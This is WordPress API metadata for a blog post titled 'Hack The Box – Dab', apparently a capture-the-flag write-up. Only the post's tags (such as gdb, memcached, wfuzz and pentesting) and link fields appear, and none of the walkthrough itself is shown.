Continue reading “Hack The Box – Dab”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[32],"tags":[8,9,13,18,35,34,33,11,36],"class_list":["post-1136","post","type-post","status-publish","format-standard","hentry","category-hack-the-box","tag-assembly","tag-binary","tag-elf","tag-gdb","tag-memcached","tag-mysql","tag-pentesting","tag-r2","tag-wfuzz"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1136"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1136"}],"version-history":[{"count":31,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1136\/revisions"}],"predecessor-version":[{"id":1177,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1136\/revisions\/1177"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}